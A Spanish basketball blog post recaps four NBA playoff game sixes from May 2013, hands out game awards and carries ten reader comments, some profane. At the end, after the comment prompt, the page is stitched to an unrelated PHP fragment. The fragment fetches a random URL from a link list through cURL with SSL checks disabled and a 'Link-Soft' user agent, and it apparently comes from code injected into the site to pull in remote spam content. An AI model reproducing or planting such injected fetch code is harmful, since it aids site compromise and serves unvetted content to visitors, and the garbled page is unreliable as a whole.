La Crónica: Que pase el siguiente

04 de May de 2013 por MagicJohnson32

Knicks, Pacers, Thunder y Grizzlies. Ya tenemos cuatro equipos más en segunda ronda después de que todos ellos venciesen anoche los sextos encuentros de sus respectivas series.

celts knicksTal vez el resultado con mayor carga emocional fue el que se produjo en Boston, donde posiblemente asistimos al final de la era Pierce & Garnett. Los Knicks dominaron el partido con claridad a partir del acierto de Prigioni en los primeros minutos, cuando el argentino anotó tres triples y puso a los suyos 16 arriba (21-5). Los Celtics sufrieron de nuevo los atascos ofensivos que han marcado su postemporada, especialmente por parte de Paul Pierce, quien tras anotar su primer tiro falló 9 consecutivos. De esta manera, y después de un parcial de 20-4 comandado por Shumpert y JR que se inició al final del tercer cuarto, los Knicks se plantaron con una renta de 26 puntos (75-49) a 9:30 para el final del partido. Todo estaba listo, esta vez sí, para el funeral de los Celtics. Pero los verdes no capitularon sin antes mostrar un último arranque de orgullo, con Jeff Green y Avery Bradley desatados para recortar la diferencia hasta los 4 puntos (77-73). Los Knicks se recompusieron a tiempo, Melo y JR anotaron un par de tiros, y los neoyorquinos pudieron al fin celebrar (88-80). No sabemos si volveremos a ver a Pierce de verde, o si KG ha jugado sus últimos minutos en la NBA. Lo que es seguro es que siempre recordaremos a este equipo y no sólo por el anillo de 2008, sino por la ilimitada capacidad competitiva de la que anoche volvió a hacer gala.

Los Celtics se van de vacaciones, mientras los Knicks ya pueden ir preparando su eliminatoria de segunda ronda, que arrancará el domingo a las 21h30 horas y donde se enfrentarán a los Pacers. Los de Indiana vivieron un encuentro similar al que se vio en Boston: alcanzaron una ventaja más que cómoda (+17 a falta de 10 minutos) y mantuvieron a los Hawks en poco más de un 30% de acierto, pero vieron peligrar la victoria en los últimos instantes al encajar un 7-21 que dejó el marcador en 76-73 con 2:40 por jugarse. Y, por supuesto, en la que fue su más que segura despedida de Atlanta, Josh Smith se jugó un triple absurdo después de un tiempo muerto de Larry Drew, fue taponado por West, y ahí se acabó la temporada de los Hawks, que no anotaron en lo que quedaba de encuentro (81-73). El día gris de George (4 puntos, aunque con 7 rebotes, 7 asistencias y 2 robos) lo compensaron entre West, Hibbert y Hill con 59 puntos y 26 rebotes. Josh Smith cierra su estancia en Atlanta con algunos detalles de sus cualidades (14 puntos, 9 rebotes, 3 asistencias, 1 tapón) y todo un muestrario de los principales defectos de su juego: 5 de 16 en tiros, 0 de 3 en triples y 4 pérdidas. A partir de octubre le veremos vestir una camiseta diferente.

También quedó definida la eliminatoria del Oeste que enfrentará a OKC Thunder con los Memphis Grizzlies y que arrancará el domingo a las 19h00. Kevin Durant despachó a los Rockets el día en que contó con la ayuda suficiente por parte de los secundarios y que Scott Brooks se decidió, al fin, a sentar a Perkins en beneficio de Collison. Kevin Martin y Derek Fisher estuvieron excelentes y superaron de manera decisiva la aportación del banquillo de los Rockets. Por ahí sele fue la vida a Houston, que no tuvo suficiente con el buen papel de sus titulares. El partido discurrió con diferencias cortas para uno y otro equipo durante tres cuartos. Entonces, la aparición de Fisher (decisivo como de costumbre en partidos clave), con 8 puntos y varias acciones defensivas sobre Harden, decantó la balanza de manera definitiva (103-94). Entre las buenas noticias para los Thunder también hay que situar a Reggie Jackson, que mantuvo su línea ascendente desde que tuvo que sustituir a Westbrook y al que ya espera Mike Conley en segunda ronda.

cpclipsPorque Conley y los Grizzlies cerraron anoche su serie contra los Clippers con una victoria que les permite desquitarse tras lo sucedido hace un año. Los angelinos tienen excusa: ante el poderosísimo juego interior de Memphis, Griffin jugó muy tocado y de hecho no fue titular. Del Negro, que queda muy tocado tras esta eliminación en primera ronda, apostó durante muchos minutos por el small-ball, y si bien Matt Barnes explotó con 30 puntos y 10 rebotes, los exteriores de los Grizzlies sacaron todo el provecho y entre Conley, Allen y Bayless metieron 60 puntos. Particularmente notable fue la actuación de Tony Allen, al que señalamos como uno de los MVP en los premios de la jornada. Por su parte, Chris Paul firmó un partido impecable en ataque, 28 puntos (11/16 en tiros) y 8 asistencias sin pérdidas, pero la propuesta de Del Negro le arrebató las riendas del partido y por ahí desaparecieron las opciones de los Clippers, que además cayeron víctimas del que tantas veces ha sido su juego: el encuentro se convirtió en un carrusel de técnicas para los visitantes y de tiros libres para los locales, que lanzaron 47 veces desde la línea (105-118). Los angelinos afrontan ahora un verano crucial, en el que intentarán por todos los medios convencer a Paul para que renueve y posiblemente sustituirán a Del Negro como head coach.

kd houstonPREMIOS

MVP: Kevin Durant no dio lugar a la sorpresa y desde el minuto 1 lideró a su equipo a la 2ª ronda con 27 puntos, 6 asistencias y 8 rebotes. Los Grizzlies también pasaron de la mano de un omnipresente Tony Allen, autor de 19 puntos, 7 rebotes, 6 asistencias y 4 robos.

Rookie: Cuando Pablo Prigioni funciona los Knicks tienen más oportunidades de llevarse los partidos. Ayer el argentino se destapó con su mejor partido de la serie, 14 puntos, 5 rebotes y 3 asistencias.

Sorpresa: Los Thunder necesitarán muchas noches como la de ayer de Kevin Martin si quieren optar, no ya al anillo sino a meterse en las Finales. El ex de Houston se fue a los 25 puntos. Reggie Jackson completó otra gran actuación con 17 puntos, 7 rebotes y 8 asistencias. Parece un mini-Westbrook.

Decepción: Paul Pierce disparó como una escopeta de feria. Tiró 18 veces y sólo anotó en 4 ocasiones para completar una eliminatoria en la que ha acertado únicamente un 37% de sus tiros de campo. Por si fuera poco, ha perdido 5,3 balones por partido. Unos Playoffs para olvidar.

Esfuerzo en vano: En ausencia de Blake Griffin, Chris Paul encontró en Matt Barnes a su perfecto escudero. El base acabó con 28 puntos y 8 asistencuas y el alero con 30 puntos y 10 rebotes. James Harden (27-6-7) también se fue para casa.

TOP 10

Imágenes | AP Photos / Getty Images

Comenta

10 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Siento el retraso en la publicación de la crónica, pero había mucha información que procesar y resumir 😉

      Citar

  2. Esteban dice:
    #2

    Mmmm q mal q veoal thunder con menphis, una defensiva asi cntra un ataque tan pesimo como el del thunder lo veo .complicado

    Shefolosha y perkins sin westbrook en cancha son obstaculos en ubna ofensiva demasiado sobrecargada en durant, q debera enfrentar a prince y a la mejor defensiva de la liga

    Apuesto por menphis en esa serie

    PD: el thunder sin westbrook son los cavs de lebron

      Citar

  3. rumbero dice:
    #3

    Bulls 17 arriba al descanso. No juegan ni Hinrich ni Deng. Tremendo lo de estos tios que deben tener en Rose a su jugador más sano pero ahi estan. Veremos si les llega la gasolina pero por el momento les está valiendo con una buena defensa y un fenomenal Noah que ya lleva un 16/5 (los cinco rebotes ofensivos)

      Citar

  4. rumbero dice:
    #4

    Que grandes estos Bulls. Que capacidad de resistencia. Cada vez que se acercaba BKN se han sacado un par de acciones de quien fuera para seguir con la ventaja con mención especial para Bellineli que ha sido clave en muchos momentos y el amigo Noah que es un pedazo de jugador de los que no hay. Es para verlo su partido.
    Y vaya batacazo es de los Nets con ese segundo mayor presupuesto y a casa en primera ronda. El partidito de JoJo es para verlo también…se supone que cobra lo que cobra para aparecer en días como hoy.
    En fin, hay ganas de ver si estos Bulls tienen algo que decir con Miami

      Citar

  5. Futurman dice:
    #5

    Cojones Noah!!!

      Citar

  6. Sancho88 dice:
    #6

    Sobre el debate de las técnicas de Crawford (aunque no esté en este hilo) yo creo (y no voy a pormenorizar una por una) que en general acierta. Vamos a ver, los de los Clippers se engorilaron y se pasaron dando hostias a saco toda la segunda parte. Y al final hecha a Z-BO, no sé si por protestar, pero desde luego lo deberían haber echado por hacerle el abrazote grizzlie al señor Griffin. Literalmente lo encula y luego le intenta meter el puño en la boca cuando ya están en el suelo. Reacción de Griffin? Cara impasible. Ese tío no tiene facciones en la cara ni gestos, ahora entiendo por qué le llaman Cyborg… por eso y por su cadera metálica para defender, es pésimo el hijo de puta, jejej

      Citar

  7. Sancho88 dice:
    #7

    Y por cierto, ya que los Celtics no quieren a Pierce y Garnett, no podrían irse a Lakers a cambio de Pau+Hill a los Celtics? Yo no creo que Garnett se retire, Pierce es de L.A. y a los Celtics siempre les ha gustado Pau. No sé, suena rocambolesco, sería como si Barsa y Madrid se intercambiasen a Villa x Higuaín o algo por el estilo, pero a mí me parece un traspaso muy muy factible. Como lo veis?

      Citar

  8. Sancho88 dice:
    #8

    Y por último, OLÉ POR LOS BULLS!!

      Citar

  9. Sancho88 dice:
    #9

    Nadie daba un duro por ellos, Noah se recupera esta temporada del tobillo y se convierte en uno de los mejores centers de la liga, Boozer temporadón también, Belinelli cuando se pone se va a más de 20 puntos, Nate igual… qué maravilla. Y todavía aparecerá Rose contra los Heat… Ojo porque algo rascarán. Se va a parecer mucho a la eliminatoria el año pasado de Miami-Indiana. Pasará Miami pero no tan facil

    Y gran placer también ver dos proyectos hundirse. Por una parte el de Brooklyn, un proyecto millonario que solo se basó en juntar contratos millonarios y ponerlos a jugar, como Lakers. Desastre total. D-Will debería pirarse a Dallas. El otro proyecto que decía (no el de los Lakers) es el de Clippers. Venga, vamos a dar pasta a dos jovenes fortotes que nos hacen las highlights y nos van a decir lo de lob city… para que luego, a la hora de la verdad, sea una mierda de equipo que depende de un solo tio. Jordan y Griffin son dos bebés gigantes que se ponen pañales para defender, porque S-E-C-A-G-A.N!! Aparentemente, dos tíos joder como dos panes de grandes, y llegan dos gordos como Marc y Randolph, pero que saben jugar al basket, y se los funden. Es que es la puta verdad, ya no hay fundamentos. Randolph es antigua escuela, un jugador estilo Duncan o Garnett, criados en los 90 y con muchísima técnica. Pero ahora… da puta lástima, solo jugadores como Howard que solo saben colgarse cuando les hacen un alley-hoop y nada más. Es tristísimo. Y encima, te pones a ver los prospects del próximo draft… y me parecen todos una puta mierda (hablo de los jugadores grandes). Son estilo Ibaka-Howard-Griffin-Jordan, a correr como pollos sin cabeza y a hundirla, y en defensa ya veremos… el Noel ese tiene una pinta de paketazo que no puede con ella. Yo digo una cosa, mucho le criticaban a Drummond, pero ese chaval tiene más basket que todos estos que acabo de decir

      Citar

  10. Jose Luis dice:
    #10

    Sancho estaba on fire anoche!

    Mucha razon en casi todo lo que dices, aunque a Noel quiero verle antes de opinar.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>